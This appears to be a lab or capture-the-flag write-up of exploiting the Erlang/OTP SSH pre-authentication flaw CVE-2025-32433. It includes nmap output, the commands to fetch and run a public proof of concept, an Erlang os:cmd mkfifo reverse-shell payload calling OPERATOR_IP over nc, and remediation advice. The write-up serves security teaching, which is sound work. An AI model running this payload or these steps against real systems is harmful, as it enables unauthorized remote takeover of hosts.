Unauthenticated Erlang/OTP SSH pre-auth RCE (CVE-2025-32433)
Foundations network engagement: dual SSH listeners; Erlang/5.2.9 on 22 accepted CVE-2025-32433 pre-auth code execution via public PoC, writing lab.txt and delivering a reverse shell through os:cmd.
- Case files
- Unauthenticated Erlang/OTP SSH pre-auth RCE (CVE-2025-32433)
Port 22 advertised SSH-2.0-Erlang/5.2.9 alongside OpenSSH on 2222. CVE-2025-32433 (CVSS 10.0) ran unauthenticated Erlang; os:cmd reverse shell recovered the lab artifact.
Identified Erlang SSH on 22; ran CVE-2025-32433.py to confirm unauthenticated write.
Erlang os:cmd mkfifo payload connected to operator listeners.
Engagement summary
Port 22 advertised SSH-2.0-Erlang/5.2.9 alongside OpenSSH on 2222. CVE-2025-32433 (CVSS 10.0) ran unauthenticated Erlang; os:cmd reverse shell recovered the lab artifact.
ERLANG/OTP SSH CVE-2025-32433 targeted a lab host with Erlang SSH on 22 and Ubuntu OpenSSH on 2222. Nmap fingerprint SSH-2.0-Erlang/5.2.9. The ProDefense public exploit sent a pre-authentication payload that confirmed RCE by writing /lab.txt. Swapping the payload to Erlang os:cmd with a mkfifo reverse shell and dual nc listeners returned an interactive shell; flag.txt and container hostname completed the engagement.
Business impact
Pre-auth RCE on Erlang/OTP SSH is full host compromise without credentials. Patch OTP past CVE-2025-32433 immediately; do not expose Erlang SSH to untrusted networks; prefer disabling the SSH daemon if unused.
Service map and PoC execution
Identified Erlang SSH on 22; ran CVE-2025-32433.py to confirm unauthenticated write.
OPERATOR · NMAP / PoC
savvy@lab:~$ nmap 10.10.237.184 -sV -sC
22/tcp open ssh Erlang/5.2.9
2222/tcp open ssh OpenSSH 9.6p1 Ubuntu
savvy@lab:~$ git clone https://github.com/ProDefense/CVE-2025-32433 && cd CVE-2025-32433
savvy@lab:~$ python3 CVE-2025-32433.py # RHOST=10.10.237.184 RPORT=22
# exploit sent — /lab.txt written on target
os:cmd reverse shell
Erlang os:cmd mkfifo payload connected to operator listeners.
PAYLOAD · ERLANG
payload.erl
os:cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc OPERATOR_IP 4444 >/tmp/f").OPERATOR · SHELL
savvy@lab:~$ nc -lnvp 4444
savvy@lab:~$ python3 CVE-2025-32433.py # with os:cmd payload
savvy@lab:~$
savvy@lab:~$ cat flag.txt && uname -a
# lab artifact + container hostname
Remediation
Upgrade Erlang/OTP; firewall port 22/Erlang SSH; monitor for anomalous pre-auth SSH traffic to Erlang banners.